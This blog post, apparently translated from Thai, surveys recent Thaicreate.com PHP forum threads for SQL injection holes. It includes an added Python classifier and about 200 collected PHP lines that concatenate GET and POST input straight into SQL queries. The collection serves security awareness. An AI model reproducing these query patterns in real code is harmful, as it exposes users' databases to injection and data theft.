
Tuesday, 13 December 2016

SQL Injection vulnerabilities in Thaicreate PHP questions

Following on from SQL injections vulnerabilities in Stack Overflow PHP questions, where someone wrote a site that pulls data from Stack Overflow to find out how many PHP questions contain code with SQL injection holes and presents it as neat statistics, I had the idea of trying the same thing on a Thai website where people ask and answer PHP questions. The one that came to mind is probably the largest community in Thailand for questions about programming in many languages, PHP among them, which is the target here. So I wrote a simple Python script to pull data from the PHP board of Thaicreate.com to see how many PHP questions and answers contain code with a SQL injection hole, meaning user input concatenated into a SQL query statement without any validation, looking only at the 30 most recent pages. I used the regular expression from SQL injections vulnerabilities in Stack Overflow PHP questions and tweaked the SQL injection check a little.
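As an added example (not the post's own scraper, and not the regex borrowed from the Stack Overflow article): a small Python classifier that labels each PHP line by how request data reaches the SQL string, which is the check the post's script performs. The sample lines are constructed, modelled on snippets quoted on this page, and the classification rules are my own assumptions.

```python
"""Label PHP lines by how request data reaches a SQL string.

Added example, not the post's own scraper. The classification rules are my
own assumptions and not the regex the post borrowed from the Stack Overflow
article; the sample lines are constructed, modelled on snippets quoted here.
"""
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

# A request superglobal followed by an index: $_GET[, $_POST[ ...
SUPERGLOBAL = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[")
# The whole indexing expression, e.g. $_POST['score'][$i]
SG_EXPR = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*(?:\[[^\]]*\])+")
SQL_VERB = re.compile(r"\b(?:select|insert|update|delete)\b", re.IGNORECASE)
# '.' just before the variable (optionally through a call such as trim(...))
CONCAT_BEFORE = re.compile(r"\.\s*(?:\w+\s*\(\s*)?$")
# '.' just after the variable (optionally after a closing parenthesis)
CONCAT_AFTER = re.compile(r"^\s*\)?\s*\.")

# Constructed samples; the first five mirror the shape of lines quoted on the
# page, the last two show code the check should not flag.
SAMPLE_LINES = [
    r"""$result=$mysqli->query("SELECT * FROM `users` WHERE `id` = '$_POST[id]'");""",
    r"""$strSQL = "SELECT * FROM user WHERE user_id = ".$_GET["uID"];""",
    r"""$stmt=$db->prepare("delete from multiupload where id ='".$_GET['id']."'");""",
    r"""$sql = "select * from employee where name like '%{$_POST['itemname']}%'";""",
    r"""$query = sprintf('select * from orders where orders_id=%s', s($con, $_GET['rid']));""",
    r"""$stmt = $db->prepare("SELECT * FROM users WHERE id = ?"); $stmt->execute([$_GET["id"]]);""",
    r"""$name = htmlspecialchars($_POST["name"]);""",
]


def scan(line: str) -> Tuple[List[str], List[Tuple[int, bool]]]:
    """Walk one PHP line tracking string literals.

    Returns the bodies of all string literals and every superglobal hit as
    (offset of '$', True if the hit sits inside a double-quoted string).
    Superglobals inside single quotes are ignored: PHP does not interpolate.
    """
    literals: List[str] = []
    hits: List[Tuple[int, bool]] = []
    quote: Optional[str] = None
    body: List[str] = []
    i = 0
    while i < len(line):
        ch = line[i]
        if quote is None:
            if ch in "\"'":
                quote, body = ch, []
            elif SUPERGLOBAL.match(line, i):
                hits.append((i, False))
        else:
            if ch == "\\" and i + 1 < len(line):   # skip escaped character
                body.append(line[i + 1])
                i += 2
                continue
            if ch == quote:
                literals.append("".join(body))
                quote = None
            else:
                if quote == '"' and SUPERGLOBAL.match(line, i):
                    hits.append((i, True))
                body.append(ch)
        i += 1
    return literals, hits


def classify(line: str) -> str:
    """'interpolated', 'concatenated', 'sprintf' or 'not-flagged'.

    A line is only considered when some string literal on it carries a SQL
    verb. Bound parameters ($stmt->execute([$_GET[...]])) leave the variable
    outside any string with no '.' around it, so they are not flagged.
    """
    literals, hits = scan(line)
    if not hits or not any(SQL_VERB.search(s) for s in literals):
        return "not-flagged"
    if any(inside for _, inside in hits):
        return "interpolated"          # "... '$_POST[id]' ..." or {$_GET[...]}
    for pos, _ in hits:
        expr = SG_EXPR.match(line, pos)
        if expr is None:
            continue
        if CONCAT_BEFORE.search(line[:pos]) or CONCAT_AFTER.match(line[expr.end():]):
            return "concatenated"      # '".$_GET["id"]."' even inside prepare()
    if "sprintf" in line:
        return "sprintf"               # %s filled from request data
    return "not-flagged"


def tally(lines: List[str]) -> Dict[str, int]:
    """Count lines per label, the statistic the post's script collects."""
    return Counter(classify(line) for line in lines)


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(f"{classify(line):>13}  {line}")
    print(dict(tally(SAMPLE_LINES)))
```

Note that the third sample is flagged even though it calls prepare(): wrapping a concatenated string in a prepared statement binds nothing.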


Result: in the 30 most recent pages, roughly 220+ threads were found whose code has a SQL injection hole. The matched lines follow.

$result=$mysqli->query("SELECT * FROM `users` WHERE `id` = '$_POST[id]'");  
$strSQL = "SELECT * FROM project2 WHERE namepro = '".$_GET["item"]."'";  
$strSQL = "SELECT *,SUM(money) as tomoney FROM donate WHERE namepro = '".$_GET["item"]."'";  
$sql_statement = "INSERT INTO revenueother( dateother, typeother, moneyother, paybyother) VALUES ('" .$_POST["dateo"] . "', '" .$_POST["typeo"] . "', '" .$_POST["moneyo"] . "', '" .$_POST["paybyo"] . "')";  
$pay_ot = "SELECT job.ser_id,job.tech_id,service.ser_id,service.sertype_id,ser_date FROM job,service,service_type WHERE service.ser_id=job.ser_id and service_type.sertype_id=service.sertype_id  AND ser_date BETWEEN '$strStartDate' and '$strEndDate' and job.tech_id = '".$_GET["tech_id"]."'";  
//$q="SELECT * FROM tbl_event WHERE date(event_start)>='".$_GET['start']."'  ";  
$strSQL = "INSERT INTO user_addcomment (src, dst, date_on , src_station , time_on , car_no , comment , name , tel , email , other) VALUES ('".$_POST["src"]."','".$_POST["dst"]."','".$_POST["date_on"]."', '".$_POST["src_station"]."','".$_POST["time_on"]."','".$_POST["car_no"]."','".$_POST["comment"]."','".$_POST["name"]."','".$_POST["tel"]."','".$_POST["email"]."','".$_POST["other"]."')";  
$query = sprintf('select * from orders where orders_id=%s',s($con,$_GET['rid']));  
$query3 = sprintf('update product set pro_amount="%s" where pro_no="%s" ',s($con,$_POST['amts']),s($con,$_POST['id_edit']));  
$strSQL =  "SELECT * FROM user WHERE user_id = ".$_GET["uID"];  
$sql="select * from set_table  where  term_ids='".$_GET[term_ids]."' ";  
$sql="INSERT INTO `time_table` (`tb_id`, `tb_subject`, `tb_time`, `tb_time_min`, `tb_time_max`, `tb_col`, `tb_week`, `tb_date`, `tb_setting`, `term_ids`) VALUES (NULL, '".$_POST[subject]."', '".$ex[1]."', '".$ex1[1]."', '".$ex_time_max."', '".$_POST[cols_table]."', '".$ex[0]."', '', '0', '".$_POST[set_term]."');";  
$rs_cg = mysql_query('SELECT forum_name,forum_id FROM forum WHERE forum_id=' . $_GET['id']); //นั  
mysql_query('UPDATE board SET board_views=board_views+1 WHERE board_id=' . $_GET['id']); //Update the view count of that thread  
$rs_cg = mysql_query('SELECT forum_name,forum_id FROM forum WHERE forum_id=' . $_GET['id']);  
$strSQL = "SELECT * FROM yeumkuendata WHERE userid = '".$_GET["userid"]."' AND statusyk = 'ยังไม่คืน' ";  
$strSQL2 = "SELECT permission FROM memberdata WHERE userid = '".$_GET["userid"]."'";  
$strSQL = "SELECT * FROM tbreserv WHERE ReservID = '".$_GET["ID"]."' ";  
$strSQLlogin = "SELECT * FROM admin WHERE user = '".trim($_POST['username'])."'  
$strSQLlogin = "SELECT * FROM personal WHERE p_card = '".trim($_POST['username'])."'  
$sql = "select * From send Where 1 and DAY(date_send)='".$_GET["dd"]."' and MONTH(date_send)='".$_GET["mm"]."' and status_s='yes' ORDER BY sendNo DESC";  
$sql="SELECT * FROM  tbl_language WHERE id='".$_GET['id']."'";  
$query = "update tbl_language set name='".$_GET['languages']."' where id='".$_GET['id']."';  
1. $sql="SELECT * FROM  tbl_language WHERE id='".$_GET['id']."'"; Filtering with WHERE on id, guess whether the result has a single value or how many values it returns; answer that yourself.  
$strSQL = "SELECT * FROM customer WHERE CustomerID = '".$_GET["CusID"]."' ";  
$sql="insert into on_off(on1,off1) values(".$_POST["on1"].",".$_POST["off1"].")";  
$strSQL = "SELECT * FROM memberdata WHERE MONTH(memregisday) BETWEEN '".$_GET['txtKeyword2']."' and '".$_GET['txtKeyword3']."' AND YEAR(memregisday) = '".$_GET['txtKeyword4']."' and status = 'USER' ";  
$strSQL2 = "SELECT * FROM bookdata WHERE MONTH(bookregisday) BETWEEN '".$_GET['txtKeyword2']."' and '".$_GET['txtKeyword3']."' AND YEAR(bookregisday) = '".$_GET['txtKeyword4']."'  ";  
$strSQL3 = "SELECT * FROM yeumkuendata WHERE MONTH(dateborrow) BETWEEN '".$_GET['txtKeyword2']."' and '".$_GET['txtKeyword3']."' AND YEAR(dateborrow) = '".$_GET['txtKeyword4']."'  ";  
$strSQL = "SELECT * FROM memberdata WHERE (memberdata LIKE '%".$_GET["txtKeyword"]."%' or numberid LIKE '%".$_GET["txtKeyword"]."%' )  ";  
$strSQL2 = "SELECT * FROM bookdata WHERE (bookdata LIKE '%".$_GET["txtKeyword"]."%' or numberid LIKE '%".$_GET["txtKeyword"]."%' )  ";  
$strSQL3 = "SELECT * FROM yeumkuendata WHERE (yeumkuendata LIKE '%".$_GET["txtKeyword"]."%' or numberid LIKE '%".$_GET["txtKeyword"]."%' )  ";  
$strSQL = "SELECT * FROM memberdata WHERE MONTH(memregisday) BETWEEN '".$_GET['txtKeyword2']."' and '".$_GET['txtKeyword3']."' AND YEAR(memregisday) = '".$_GET['txtKeyword4']."'  ";  
$strSQL = "INSERT INTO repost (strdate,enddate,room,name,tel) VALUES ('".$_POST["date1"]."', '".$_POST["date2"]."','".$_POST["txtRoom"]."','".$_POST["txtName"]."' ,'".$_POST["tel"]."' )";  
$query = "SELECT * FROM test WHERE tags LIKE '%$_GET[value]%' order by id desc";  
$query = "SELECT * FROM test WHERE tags LIKE '%".($_GET[value]).",%' order by id desc";  
$strSQL = "INSERT INTO member (User,Password,Name,LastName,Gender,Address,Province,ZipCode,Tel,Email,employee,SID,Active) VALUES ('".$_POST[txtUser]."','".$_POST[txtPass]."', '".$_POST[txtName]."','".$_POST[txtLastName]."' ,'".$_POST[rdoGender]."','".$_POST[txtAddress]."', '".$_POST[txtProvince]."','".$_POST[txtZipCode]."','".$_POST[txtTel]."', '".$_POST[txtEmail]."','USER','employee','".session_id()."','No')";  
$strSQL = "SELECT * FROM user WHERE username = '".trim($_POST['username'])."' ";  
$strSQL = "INSERT INTO user (username,password,lastname,address,tel,email) VALUES ('".$_POST["username"]."', '".$_POST["password"]."','".$_POST["lastname"]."','".$_POST["address"]."' ,'".$_POST["tel"]."' ,'".$_POST["email"]."')";  
$query ="SELECT  id_name,date0,total FROM `service` where m = '".$_GET["month"]."' AND Y ='".$_GET["year"]."'";  
$sqldel="Delete From stock_tb_module Where iduser='".$_GET['deluser']."'";  
$seek="Select iduser from stock_tb_module Where iduser='".$_POST['user']."'";  
$sqlsave="INSERT INTO stock_tb_module(iduser,typeuser) Values('".$_POST['user']."','".$_POST['type']."')";  
$sql="Select stock_tb_module.*,tb_user.nameuser,tb_user.surname From stock_tb_module INNER JOIN tb_user ON stock_tb_module.iduser=tb_user.iduser Where stock_tb_module.iduser='".$_GET['user']."'";  
$sql="UPDATE stock_tb_module SET typeuser='03' Where iduser='".$_GET['id']."'";  
$sql="DELETE From stock_tb_module Where iduser='".$_GET['id']."'";  
$sql="Select * From stock_tb_kind_type where kindid='".$_GET['kindid']."' Order by kindtypeid";  
$sqldetail="INSERT INTO stock_tb_beg_master_sub(nobeg,kindtypeid,total,forbeg,user_name) Value('".$_GET['bk']."','".$_SESSION['sess_kindid'][$kid]."','".$beg[$i]."','".$for[$i]."','$user_name')";  
$sqlk="Select stock_tb_kind_type.*,stock_tb_unit.unitname From stock_tb_kind_type INNER JOIN stock_tb_unit ON stock_tb_kind_type.unitid=stock_tb_unit.unitid Where kindtypeid='".$_GET['id']."'";  
$sql = "SELECT *  FROM saler  WHERE sale_id LIKE '%".$_POST["search"]."%'";  
$sql = "SELECT *  FROM saler  WHERE sale_id LIKE '%".$_POST["keyword"]."%'";  
$strSQL = "SELECT * FROM order_details WHERE pro_id='".$_GET["txtKeyword"]."'";  
$strSQL = "INSERT INTO use_addcomment (src, dst, date_on , stc_station , time_on , car_no , comment , name , tel , email , other) VALUES ('".$_POST["src"]."','".$_POST["dst"]."','".$_POST["date_on"]."', '".$_POST["src_station"]."','".$_POST["time_on"]."','".$_POST["car_no"]."','".$_POST["comment"]."','".$_POST["name"]."','".$_POST["tel"]."','".$_POST["email"]."','".$_POST["other"]."',)";  
$strSQL = "SELECT * FROM bookdata inner join typedata on bookdata.typeid = typedata.typeid WHERE (namebook LIKE '%".$_GET["txtKeyword"]."%' or numberid LIKE '%".$_GET["txtKeyword"]."%' )  ";  
$strSQL = "SELECT * FROM memberdata inner join majordata on memberdata.majorid = majordata.majorid WHERE userid = '".$_GET["userid"]."' ";  
$strSQL = "SELECT * FROM yeumkuendata WHERE userid = '".$_GET['userid']."' ";  
$strSQL = "SELECT * FROM picture WHERE (projectid LIKE '%".$_GET["txtKeyword"]."%' )";  
$strSQL = "SELECT * FROM picture WHERE (projectid LIKE '%".$_GET["txtKeyword"]."%' )"; // original  
$strSQL = "SELECT * FROM picture WHERE projectid LIKE '%".$_GET["txtKeyword"]."%' "; // changed  
$strSQL = "SELECT * FROM picture WHERE projectid LIKE '%".$_GET["txtKeyword"]."%' ";  
select * from tabientb where (tabienno1 and tabienno2) LIKE '%$_POST[search]%'  
$sql = " select * from tabientb where CONCAT(tabienno1, tabienno2) LIKE '%$_POST[search]%' ";  
$sql = " select * from tabientb where (tabienno LIKE '%$_POST[search]%') AND (tabienno2 LIKE '%$_POST[search]%') ";  
select * from tabientb where tabienno1 LIKE '%enno2 LIKE '%$_POST[search]%'  
$strSQL = "INSERT INTO `member`(`username`,`password`,`name`,`lname`) VALUES ('".$_POST['username']."',  
$strSQL = "INSERT INTO memberdata (userid,password,sex,titlename,fname,lname,majorid,email,mempic,status,memregisday) VALUES ('".$_POST["userid"]."',  
$strSQL = "SELECT * FROM orders WHERE OrderID = '".$_GET["OrderID"]."' ";  
$strSQL = "SELECT * FROM student WHERE (class='".$_GET["txtKeyword"]."')";  
$strSQL = "SELECT * FROM yeumkuendata WHERE ykid = '".trim($_POST['ykid'])."' ";  
$strSQL = "INSERT INTO yeumkuendata (userid,numberid,dateborrow,datesetreturn,statusyk) VALUES ('".$_POST["userid"]."',  
$query2 = sprintf('select * from department where d_id=%s',s($con,$_GET['dept']));  
$query2 = sprintf('select * from departmentp inner join personnel on departmentp.ds_id = personnel.ds_id  where departmentp.ds_id=%s',s($con,$_GET['dept']));  
$sel_part = "select * from tblpart where PartID = '".$_POST['chkorder'][$i]."'";  
$sql="select b.pro_name,b.coler,b.pro_year,a.cat_name from category as a inner join product as b on a.cat_id=b.cat_id inner join branch as c on b.id_b=c.id_b where c.id_b='".$_GET['id_b']."' GROUP BY pro_name,coler,pro_year";  
$num_car=mysql_num_rows(mysql_query("select pro_name,coler,pro_year from product where pro_name='".$result1['pro_name']."' and id_b='".$_GET['id_b']."'"))  
$num_car=mysql_num_rows(mysql_query("select pro_name,coler,pro_year from product where pro_name='".$result1['pro_name']."' and coler='".$result1['coler']."' and pro_year='".$result1['pro_year']."' and id_b='".$_GET['id_b']."'"))  
$strSQL = "SELECT * FROM book WHERE dates='".$_POST["myDate1"]."' and btime= '".$_POST["mytime"]."' and status='1' rid = '".$_POST["myRoom"]."' ";  
$strSQLday1 = "SELECT SUM(`INV# AMOUNT`) as Total FROM `orderheader` WHERE `INV# DATE` LIKE '%20160901%' AND `ORDER DATE` LIKE '%20160901%' AND `SALESMAN` LIKE '43406'  "; /* WHERE (TERM_NO LIKE '%".$_GET["txtKeyword"]."%') */  
$query_rs_type="SELECT * FROM product_type WHERE gr_id ='".$_GET['lsgroup']."' ";  
$strSQL = "SELECT * FROM calendar WHERE ((year = '".trim($_POST['year'])."' and month = '".trim($_POST['month'])."'  
$strSQL = "INSERT INTO calendar (title,color,year,month,day,time_start,time_end,Email) VALUES ('".$_POST["title"]."','".$_POST["color"]."','".$_POST["year"]."','".$_POST["month"]."',  
$sql="insert into ems (ems) values ('".$_POST['ems']."')";  
$strSQL = "SELECT  * FROM customer  WHERE (CustomerID LIKE '%".$_GET["txtKeyword"]."%' or Email LIKE '%".$_GET["txtKeyword"]."%' )";  
$strSQLdel = "DELETE FROM tblmyfiles WHERE ID = '".$_GET["ID"]."'";  
$sqltxtQty = "SELECT product_amount FROM product WHERE product_id ='".$_POST["txtProductID"]."'" ;  
$strSQL = "SELECT * FROM files WHERE (Name='".$_GET["txtKeyword"]."' or keyword='".$_GET["txtKeyword"]."' )";  
$strSQL = "SELECT * FROM files WHERE (Name LIKE '%".$_GET["txtKeyword"]."%' or keyword LIKE '%".$_GET["txtKeyword"]."%' )";  
$sql="UPDATE assessment_kpi SET score='".$_POST['score'][$i]."', head='".$_POST['head'][$i]."' where id_kpi='".$_POST['id'][$i]."' ";  
$sql = $sql="UPDATE assessment_kpi SET score='".$_POST['score'][$i]."', head='".$_POST['head'][$i]."' where id_kpi='".$_POST['id'][$i]."' ";  
$strSQL = "INSERT INTO Scan (RFID,Date,Time,Late) VALUES ('".$_POST["txtStudentID"]."','".date("Y-m-d")."' ,'".date("H:i:s")."','".$timeDiff."')";  
$sql="Update member set Password='".$_POST["txtPass"]."',Name='".$_POST["txtName"]."',LastName='".$_POST["txtLastName"]."',Gender='".$_POST["rdoGender"]."',Address='".$_POST["txtAddress"]."',Province='".$_POST["txtProvince"]."',ZipCode='".$_POST["txtZipCode"]."',Tel='".$_POST["txtTel"]."',Email='".$_POST["txtEmail"]."' where MemberID=$id";  
$stmt=$db->prepare("delete from multiupload where id ='".$_GET['id']."'");  
$strSQL = "SELECT * FROM location_marker WHERE Locationname_id ='$_GET[Locationname_id]'";  
$strSQL = "SELECT * FROM location_areaname WHERE Locationname_id ='$_GET[Locationname_id]'";  
$strSQL = "SELECT * FROM location_polylinename WHERE Locationname_id ='$_GET[Locationname_id]'";  
$rs = mysql_query("SELECT * FROM tb_applyjob WHERE jid = $_GET[jid]");  
$strSQL = "SELECT * FROM family WHERE family_name_th = '".$_POST["txtfamily_name_th"]."' ";  
$strSQL = "SELECT asset FROM tbl_asset WHERE 1 AND asset = '".$_POST["sCusID"]."'";  
$query2 = sprintf('update orders set orders_status=2 where orders_id=%s',s($con,$_POST['orid']));  
$strSQL = "SELECT * FROM animal WHERE animal_id = '".$_GET["CusID"]."' ";  
$sql = "insert into uploadimags(name,date,image) value('".$_POST['Name']."','".date('Y-m-d H:i:s')."','".$new_images."')";  
$sqll = "select * from uploadimags where name = '".$_POST['Name']."'";  
$query1="SELECT * from tag_work_building_2  where id = '$_GET[id]'";  
$strSQL = "INSERT INTO calendar (title,year,month,day,time_start,time_end) VALUES ('".$_POST["title"]."','".$_POST["year"]."','".$_POST["month"]."',  
$query = sprintf('select * from event where id_event="%s"',s($con,$_GET['idv']));  
select * from event where id_event= $_GET['id_event']  
$strSQL = "SELECT * FROM customer WHERE 1 AND Customer_Code = '".$_POST["sCusID"]."' ";  
$sql="select * from tabletb where id='$_GET[id]'";  
When it reaches $sql="select * from tabletb where id='$_GET[id]'"; no $_GET[id] value has been sent.  
$sql_cate="select * from category where id='$_GET[id]'";  
$sql = "select * from table_name where id = '$_GET['id']' ";  
$sql = "select * from employee where name like '%{$_POST['itemname']}%'  or duty like '%{$_POST['itemname']}%'";  
$strSQL = "SELECT * FROM packing WHERE ProductID = '".$_GET["FilesID"]."' " ;  
$strSQL = "SELECT * FROM flavor WHERE ProductID = '".$_GET["FilesID"]."' ";  
///$strSQL = "SELECT * FROM  idp3  WHERE (day LIKE '%".$_GET["txtKeyword"]."%' or  day LIKE '%".$_GET["txtKeyword"]."%' )";  
$strSQL = "SELECT * FROM tbl_item,rentorder WHERE (tbl_item.TERM_NO LIKE '%".$_GET["txtKeyword"]."%' and rentorder.TERM_NO LIKE '%".$_GET["txtKeyword"]."%')";  
$strSQL = "SELECT * FROM tbl_item WHERE (tbl_item.TERM_NO LIKE '%".$_GET["txtKeyword"]."%')";  
$strSQL2 = "SELECT * FROM rentorder WHERE (rentorder.TERM_NO LIKE '%".$_GET["txtKeyword"]."%')";  
$strSQL = "SELECT * FROM number WHERE username ='".trim($_POST['usernamelogin'])."'  
$strSQL2 = "INSERT INTO files (PicName,FilesName) VALUES ('".$_POST["txtPicName"]."','".$_FILES["filUpload"]["name"]."')";  
$strSQL2 = "INSERT INTO files (ID,PicName,FilesName) VALUES ('".$insertID."',".$_POST["txtPicName"]."','".$_FILES["filUpload"]["name"]."')"; // added Field ID to table file  
$res = $mysqli->query("SELECT * FROM article WHERE article_id =".$_GET['u']);  
$query2= sprintf ('select * from product where pro_no="%s" ',s($con,$_GET['id_del']));  
$query = sprintf('delete from product where pro_no="%s" ',s($con,$_GET['id_del']));  
$q="SELECT * FROM car WHERE date(timego)>='".date("Y-m-d",$_GET['start'])."'  ";  
$objQuery1 = "SELECT * FROM Register where $ddlSelect LIKE '%".$_POST["txtKeyword"]."%'" ;  
; //*** Insert Record ***// $objConnect = mysql_connect(localhost","adtec","adtec1234") or die("Error Connect to Database"); $objDB = mysql_select_db("adtec"); mysql_query("SET character_set_results=utf8"); mysql_query("SET character_set_client=utf8"); mysql_query("SET character_set_connection=utf8"); $strSQL = "INSERT INTO album"; $strSQL .="(AlbumName,AlbumShot,Details,Male,Female,Tim,one,two,tre,four,five,note) VALUES ('".$_POST["txtAlbumName"]."','".$fileName."','". $_POST["Namer"]."','". $_POST["M"]."','". $_POST["F"]."','". $_POST["more"]."','". $_POST["textfield4"]."','".$_POST["textfield5"]."','".$_POST["textfield6"]."','".$_POST["textfield7"]."','".$_POST["textfield8"]."','".$_POST["textfield"]."')"; $objQuery = mysql_query($strSQL); mysql_close($objConnect); } ?> 
Should I fix it at $sql_data = "update tb_order set paystatus='$_POST[paystatus]' where refid = '$_POST[refid2]'"; ?..  
mysql_query("INSERT INTO contact (id,message,name,phone,email,dateregist,timeregist) values('', '$_POST[message]','$_POST[name]','$_POST[phone]','$_POST[email]','$e_date', '$etime')") or die ("Cannot Add Database");  
$strSQL = "SELECT * FROM customer WHERE 1 AND CustomerID = '".$_POST["sCusID"]."' OR Email = '".$_POST["eMail"]."' ";  
$sort = mysqli_query ($con,"SELECT order_no FROM choose where Ad_num =".$_GET['pno'] );  
$strSQL = "SELECT * FROM product WHERE Supplier_ID = '".$_GET["Supplier_ID "]."' ";  
$strSQL = "SELECT * FROM radio_member WHERE Username = '".trim($_POST['txtUsername'])."' ";  
$strSQL = "INSERT INTO radio_member (Username,Password,Name) VALUES ('".$_POST["txtUsername"]."',  
$resultms = mysql_query("update ms set actqty = actqty-'".$_POST["qty$i"]."' where shopcode='".$_GET["shopcode"]."' AND  productid = '".$_POST["productid$i"]."'");  
$strCHECKms = "SELECT * FROM  ms WHERE shopcode = '".$shop."' AND productid = '".$_POST["productid$i"]."'";  
$resultoshop = mysql_query("update ms set actqty = actqty + '".$_POST["qty$i"]."' where shopcode='".$shop."' AND  productid = '".$_POST["productid$i"]."'");  
$resultcheckstock = mysql_query("update  checkstock set status = 'Y' where shopcode='".$_GET["shopcode"]."' AND  productid = '".$_POST["productid$i"]."'");  
at this insert into, store the value of $_POST['province_id][$i]  
$sql="select * from  time_sample where team='".$_POST['Require']."' and day_='".$_POST['day_']."' order by id desc";  
$sql="select * from sample_user where id_staff='".$arr['id_staff']."' and day_='".$_POST['day_']."'";  
$sqlup ="update stock set stock = stock - '".$_POST["txt_stock"]."' where `p_id`= '".$_POST["txt_id"]."'";  
$sqlup ="update stock set stock = stock - '".$_POST["txt_stock"][$i]."' where `p_id`= '".$_POST["txt_id"][$i]."'";  
$strSQL2 = "SELECT * FROM orders_detail WHERE o_id = '".$_GET["o_id"]."' ";  
//$strSQL = "SELECT * FROM products,bom WHERE (Pro_ID LIKE '%".$_GET["txtKeyword"]."%')";  
$strSQL = "INSERT INTO files (Name,FilesName) VALUES ('".$_POST["txtName"]."','".$_FILES["filUpload"]["name"]."')";  
$strSQL = "INSERT INTO files (Name,FilesName,upload) VALUES ('".$_POST["txtName"]."','".$_FILES["filUpload"]["filUpload2"]["name"]."')";  
$strSQL = "SELECT * FROM bk_room_type WHERE room_type_name = '".trim($_POST['room_type_name'])."'";  
$strSQL = "SELECT * FROM bk_building WHERE building_name = '".trim($_POST['building_name'])."'";  
$strSQL = "SELECT * FROM bk_janitor WHERE janitor_name = '".trim($_POST['janitor_name'])."'";  
$strSQL = "SELECT * FROM bk_member_title WHERE titlename = '".trim($_POST['titlename'])."'";  
$strSQL = "SELECT * FROM bk_member_majorname WHERE majorname = '".trim($_POST['majorname'])."'";  
Result=mysql_query("INSERT INTO tb_example (Booking_ID,Province_ED) VALUES ('".$Booking_ID."','".$_POST['Province_ID'][$i]."')");  
$strSQL = "SELECT * FROM customer WHERE (billing LIKE '%".$_GET["txtCredit"]."%' AND billing LIKE '%".$_GET["txtCash"]."%' )";  
$sql_up = "update product set ProductCode='$_POST[txtProductCode]', ProductName='$_POST[txtProductName]',Description='$_POST[txtDescription]', Price='$_POST[txtPrice]',PriceNormal='$_POST[txtPriceNormal]', PriceSend='$_POST[txtPriceSend]',Stock='$_POST[txtStock]', Promotion='$_POST[rdoPromotion]',New='$_POST[rdoNew]' where ProductID='$_GET[ProductID]'";  
$sql_up = "update product set Picture='$file_name' where ProductID='$_GET[ProductID]'";  
$sql_up = "update product set  Picture='$file_name',ProductCode='$_POST[txtProductCode]', ProductName='$_POST[txtProductName]',Description='$_POST[txtDescription]', Price='$_POST[txtPrice]',PriceNormal='$_POST[txtPriceNormal]', PriceSend='$_POST[txtPriceSend]',Stock='$_POST[txtStock]',Promotion='$_POST[rdoPromotion]',New='$_POST[rdoNew]' where ProductID='$_GET[ProductID]'";  
$sql_update = "update product set Picture='$file_name' where ProductID='$_GET[ProductID]'";  
$sql_up = "update product set  Picture='$file_name',ProductCode='$_POST[txtProductCode]', ProductName='$_POST[txtProductName]',Description='$_POST[txtDescription]', Price='$_POST[txtPrice]',PriceNormal='$_POST[txtPriceNormal]', PriceSend='$_POST[txtPriceSend]',Stock='$_POST[txtStock]', Promotion='$_POST[rdoPromotion]',New='$_POST[rdoNew]' where ProductID='$_GET[ProductID]'";  
$query = "SELECT * FROM amount_cus where = " .$_GET['edit_id'];  
$strSQL = "INSERT INTO conven (convenID,dormitoryID,coname,costatus) VALUES (NULL,'$convenroomid','".$_POST["conven"][$i]."','T')";  
$StrSql = "Select * from picupload WHERE ServiceCode LIKE '%".$_GET["txtKeyword"]."%'";  
$strSQL = "SELECT * FROM history_med WHERE (id_run LIKE '%".$_POST["recvid"]."%'  )";  
$strSQL = "SELECT MAX(milesin) as max_milesin FROM ots_table WHERE carlicense  = '".$_GET["item"]."' ORDER BY carlicense ASC";  
$strSQL ="SELECT MAX(milesin) as max_milesin FROM ots_table WHERE carlicense  = '".$_GET["item"]."' ORDER BY carlicense ASC";  
$strSQL ="SELECT MAX(milesin) as max_milesin FROM ots_table WHERE carlicense = '".$_POST["item"]."' ORDER BY carlicense ASC";  
$result= mysql_query("SELECT MAX(milesin) as max_milesin FROM ots_table WHERE carlicense = '".$_POST["item"]."' ORDER BY carlicense ASC");  
echo $strSQL = "UPDATE article SET topic = '".trim($_POST['topic'])."'  
$strSQL = "SELECT * FROM member WHERE Username = '".trim($_POST['txtUsername'])."' and Password = '".trim($_POST['txtPassword'])."' and Active = 'Yes' ";   
SELECT * FROM ( select * from personal where p_id=".($_GET['p_id']*1).") per  
$strSQL = "SELECT * FROM tbRoom WHERE ID_Room = '".$_GET["RoomID"]."' ";  
$q="SELECT *  FROM doctable WHERE name='หมอหนึ่ง' ORDER by date(timego)>='".$_GET['start']."'  ";  
$q="SELECT *  FROM doctable WHERE name='$roo_id' ORDER by date(timego)>='".$_GET['start']."'  ";  
$q="SELECT *  FROM doctable WHERE id='$roo_id' ORDER by date(timego)>='".$_GET['start']."'  ";  
$q="SELECT * FROM doctable WHERE date(timego)>='".$_GET['start']."'  ";  
$q="SELECT * FROM doctable WHERE name='$roo_id' ORDER by date(timego)>='".$_GET['start']."'  ";  
$sqld = "DELETE FROM brand WHERE id='".$_GET['did']."'";  
$result = mysql_query("update product set qty = qty - '".$_POST["txtQty$i"]."' where ProductID = '".$_POST["txtProductID2$i"]."'");  
$strSQL3 = "SELECT * FROM tb_ps WHERE PS_id = '".$_GET['id']."' ";  
$strSQL2 = "SELECT * FROM tb_ps WHERE PS_sale LIKE '%".$_GET['txtkeyword']."%' ";  
$sql = "UPDATE files SET filestatus = '$status' where FileID = '".$_POST['FileID']."'";  
mysql_query("UPDATE member SET m_view=(m_view+1) WHERE m_id = '".$_GET["id"]."' AND m_line = '".$_GET["line"]."'" );  
$sqls="SELECT * FROM member where m_id ='".$_GET[id]."' AND m_line = '".$_GET[line]."'";  
$sqls="SELECT * FROM member where m_id ='".$_GET[id]."' AND m_line = '".$_GET[line]."' ";  
$strSQL = ("INSERT INTO history_med(id_person,name_med,value_med) VALUES('"."','".$_POST["xx"]."','".$_POST["xy"]."')") ;  
$q="select * from member where k_name like'$_GET[name]%' and k_age like'$_GET[age]%' and k_sex like '$_GET[sex]%' and k_address like '$_GET[s]%' and k_date like '$_GET[k_date]%'";  
$sql ='SELECT * FROM member WHERE u_ser = "'.$_POST['i_ur'].'"';  
$strSQL2 = "UPDATE product SET product_qty = product_qty - ".$rs['product_qty']." WHERE product_id = '".$_REQUEST['product_id']."'";  
$sql3 = "select * from send where send_id = '$_GET[user_send_id]'";  
$sql = " insert into book( book_id, book_name , book_detail, typebook_id) VALUES ( null, '$bookname', '$_POST[book_detail]', '$_POST[typebook_id]');";  
